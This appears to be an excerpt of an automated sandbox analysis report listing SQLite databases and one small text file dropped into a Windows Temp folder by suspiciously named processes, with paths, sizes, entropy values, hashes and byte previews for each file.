                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\gHB6dWl8pr

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\gQxbP5DYWR

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\h7Po7bUx45

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):98304
                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\hPh3WgxpZq

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\hXa10jA9Kc

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\hkNFU87Pes

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\hlJlSfXfd6

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\htathUFsMx

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\iT0CMi6HYs

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ipS3HkqvQ6

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\iq3R3mF2zf

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\jsst8Vlreb

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\kNsCEcp9bO

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\kU2NnLCYxk

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\kVYOXZyqNy

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\l6qCWDmO8j

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\l7eRP4ZeWh

                                                                                                Download File
                                                                                                Process:C:\HyperWebbroker\serverBrokerperfMonitor.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.293660689688184
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:FCpTXRug5Mi:SzRugR
                                                                                                MD5:F84BF171C1D874A8CE02AC2471447178
                                                                                                SHA1:D0D7F219F0478DEE1CE7F829672991D91F902541
                                                                                                SHA-256:5CFA7F51175DCC5EA6A3A59380818A5DFBCA80392D8A177A68A8DCE71975ACB3
                                                                                                SHA-512:0FE50E7B9F9F7E55B3682FECD5B25B1188DDB686BED1263D905E4CB185BDB95D4F440F7A10C13A38E27C1C969D264F65DF15E358B95A5F981850578145AB168F
                                                                                                Malicious:false
                                                                                                Preview:BaI8en86v0yMFHFJXQ8GCkToG

                                                                                                C:\Users\user\AppData\Local\Temp\lK0GsSQ8im

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\lUdzaQppOF

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\lw4MwRlJV0

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\lwbCY2LUif

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\mA91P9NPGp

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\mHnFW0X4Ya

                                                                                                Download File
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
